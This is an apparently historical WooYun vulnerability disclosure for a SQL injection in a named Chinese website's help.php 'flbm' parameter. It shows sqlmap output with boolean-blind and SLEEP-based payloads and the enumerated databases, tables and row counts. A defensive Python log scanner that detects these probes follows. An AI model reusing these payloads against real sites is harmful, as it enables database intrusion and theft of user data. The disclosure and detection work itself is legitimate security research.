WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-09-17: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly. 2015-11-01: The vendor has actively ignored the vulnerability; details disclosed to the public.
Injection
Injection point
http://www.xuanhao.com/help/help.php?flbm=0907
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: flbm (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flbm=0907' AND 5791=5791 AND 'jBSb'='jBSb

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: flbm=0907' AND (SELECT * FROM (SELECT(SLEEP(10)))dVwa) AND 'GVgY'='GVgY
---
web application technology: PHP 5.2.11, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
available databases [8]:
[*] `15_testxh`
[*] `28_2011xuan`
[*] `46_gdxuanhao`
[*] `47_szxuanhao`
[*] information_schema
[*] js_xuanhao
[*] test
[*] xuanhaodotcom

Database: 28_2011xuan
[45 tables]
+---------------------+
| c_category          |
| c_company           |
| c_glry              |
| c_glrydl            |
| c_storage           |
| c_ware              |
| c_ware_tmp          |
| c_website           |
| hao_bm              |
| hao_dyfl            |
| hao_dzhm            |
| hao_glry            |
| hao_glrydl          |
| hao_glryqx_category |
| hao_glryxs          |
| hao_gwc_ddb         |
| hao_gwc_ddb_bak     |
| hao_gwc_shr         |
| hao_gwc_shr_bak     |
| hao_gwc_wdsc        |
| hao_gwc_xx          |
| hao_gwc_xx_bak      |
| hao_hyjbxx          |
| hao_news            |
| hao_news_category   |
| hao_number          |
| hao_numberbak       |
| hao_spfl            |
| hao_sppl            |
| hao_spsx            |
| hao_spxqtp          |
| hao_spxx            |
| hao_stroke          |
| hao_temp            |
| hao_tmp             |
| hao_tplj            |
| hao_tpljxq          |
| hao_tzsc            |
| hao_website         |
| hao_xwfl            |
| hao_xwpl            |
| hao_xwtp            |
| hao_xwxq            |
| hao_xwztml          |
| hao_zxzx            |
+---------------------+

Database: 28_2011xuan
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| hao_spxx            | 410949  |
| hao_gwc_xx          | 102230  |
| hao_gwc_shr         | 90035   |
| hao_gwc_ddb         | 85502   |
| hao_glrydl          | 61525   |
| hao_glryxs          | 53117   |
| hao_gwc_xx_bak      | 45656   |
| hao_gwc_ddb_bak     | 42239   |
| hao_gwc_shr_bak     | 42227   |
| hao_hyjbxx          | 28466   |
| c_ware              | 25202   |
| hao_gwc_wdsc        | 19721   |
| hao_xwxq            | 6329    |
| hao_numberbak       | 5296    |
| hao_tpljxq          | 4575    |
| c_glrydl            | 4529    |
| hao_tzsc            | 4371    |
| hao_dyfl            | 2764    |
| hao_zxzx            | 2253    |
| hao_dzhm            | 1915    |
| c_storage           | 391     |
| hao_spsx            | 297     |
| hao_sppl            | 263     |
| hao_xwtp            | 132     |
| hao_bm              | 100     |
| hao_stroke          | 81      |
| hao_xwfl            | 78      |
| hao_xwpl            | 59      |
| hao_spfl            | 41      |
| c_category          | 37      |
| hao_glryqx_category | 30      |
| hao_glry            | 29      |
| c_glry              | 11      |
| hao_tplj            | 7       |
| hao_xwztml          | 2       |
| c_website           | 1       |
| hao_news            | 1       |
| hao_news_category   | 1       |
| hao_temp            | 1       |
| hao_website         | 1       |
+---------------------+---------+
As above.
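The sqlmap output above shows the two probe families that confirmed the flbm injection: a boolean tautology (AND 5791=5791) and a MySQL SLEEP() time delay. The following is an added example, not part of the original WooYun report or of the xuanhao.com site code, showing how a defender can flag exactly these probe shapes in web access logs. The log lines are constructed in Common Log Format and carry the report's own payloads URL-encoded; the regexes, parameter names and the SAMPLE_LOG list are this example's assumptions. Detection of this kind is an alerting aid only; the fix for the reported flaw is a parameterized query in help.php.

```python
"""Flag blind-SQL-injection probes (boolean tautology, SLEEP/BENCHMARK delay)
in web access logs. Added example; not code from the original report."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Boolean-based blind: a numeric tautology such as "AND 5791=5791" or "OR 1=1".
BOOLEAN_PROBE = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.IGNORECASE)
# Time-based blind: MySQL SLEEP() or BENCHMARK() inside a parameter value.
TIME_PROBE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)
# Request field of a Common Log Format line: "GET /path?query HTTP/1.1"
REQUEST_FIELD = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log (assumption): one clean request, then the report's
# boolean-based and time-based payloads, percent-encoded as a browser would send them.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Sep/2015:10:00:01 +0800] '
    '"GET /help/help.php?flbm=0907 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [17/Sep/2015:10:00:02 +0800] '
    '"GET /help/help.php?flbm=0907%27%20AND%205791%3D5791%20AND%20%27jBSb%27%3D%27jBSb'
    ' HTTP/1.1" 200 5120',
    '203.0.113.5 - - [17/Sep/2015:10:00:03 +0800] '
    '"GET /help/help.php?flbm=0907%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP'
    '%2810%29%29%29dVwa%29%20AND%20%27GVgY%27%3D%27GVgY HTTP/1.1" 200 5120',
]


def classify_value(value: str) -> list:
    """Return the probe families ('boolean', 'time') matched by one decoded parameter value."""
    hits = []
    if BOOLEAN_PROBE.search(value):
        hits.append("boolean")
    if TIME_PROBE.search(value):
        hits.append("time")
    return hits


def scan_request_target(target: str) -> dict:
    """Map each query parameter of a request target to the probe families it matches.

    Returns an empty dict for a clean request.
    """
    query = urlsplit(target).query
    findings = {}
    for name, raw in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decodes once; decode again to catch double-encoded payloads.
        hits = classify_value(unquote_plus(raw))
        if hits:
            findings[name] = hits
    return findings


def scan_log(lines: list) -> list:
    """Return (line_number, parameter, families) for every suspicious request line."""
    alerts = []
    for lineno, line in enumerate(lines, start=1):
        m = REQUEST_FIELD.search(line)
        if not m:
            continue  # not a request line we can parse; skip rather than guess
        for param, families in scan_request_target(m.group("target")).items():
            alerts.append((lineno, param, families))
    return alerts


if __name__ == "__main__":
    for lineno, param, families in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: parameter {param!r} matches {', '.join(families)} probe")
```

Both patterns are deliberately narrow: they will catch a sqlmap-style first pass like the one in the report, but a tautology written with strings (`'a'='a'`) or a delay built from other functions needs additional rules, so treat this as a starting signature set rather than a complete filter.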
- -
Vendor could not be contacted, or the vendor actively declined.